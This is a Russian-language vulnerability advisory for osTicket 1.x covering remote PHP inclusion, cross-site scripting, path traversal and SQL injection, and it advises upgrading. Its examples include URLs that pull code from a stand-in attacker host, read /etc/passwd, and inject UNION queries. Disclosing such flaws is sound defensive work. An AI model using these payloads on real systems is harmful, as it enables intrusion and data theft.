Множественные уязвимости в osTicket
| Дата публикации: | 06.05.2005 |
| Дата изменения: | 24.03.2009 |
| Всего просмотров: | 2842 |
| Опасность: | Высокая |
| Наличие исправления: | Да |
| Количество уязвимостей: | 1 |
| CVE ID: |
CVE-2005-1436 CVE-2005-1437 CVE-2005-1438 CVE-2005-1439 |
| Вектор эксплуатации: | Удаленная |
| Воздействие: |
Межсайтовый скриптинг Раскрытие важных данных Неавторизованное изменение данных Компрометация системы |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | osTicket 1.x |
| Уязвимые версии: osTicket
Описание: 1. PHP инклюдинг возможен при включенных инклюдах и глобальных переменных в конфигурационном файле php. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный PHP сценарий на целевой системе с привилегиями web сервера. Пример: http://[target]/include/main.php?config[search_disp]=true&include_dir=http://attacker 2. Межсайтовый скриптинг возможен из-за некорректной обработки входных данных в нескольких параметрах. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML сценарий в браузере жертвы в контексте безопасности уязвимого сайта. Примеры:
http://[target]/view.php?e=test@test.com&t=480826[XSS] 3. Уязвимость существует в сценарии 'attachments.php' при включенной опции загрузки файлов на сервер. Удаленный пользователь может просмотреть произвольные файлы на системе. Пример: http://[target]/attachments.php?file=../../../../../../.. /etc/passwd 4. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL команды в базе данных уязвимого приложения. Примеры:
http://[target]/admin.php?a=view&id=-99%20UNION http://[target ]/admin.php?a=view&id=-99%20UNION http://[target]/view.php?s=advanced &query=&cat=-99 URL производителей: www.osticket.com Решение: Установите последнюю версию с сайта производителя. Журнал изменений: |
|
| Ссылки: | Multiple Vulnerabilities In osTicket |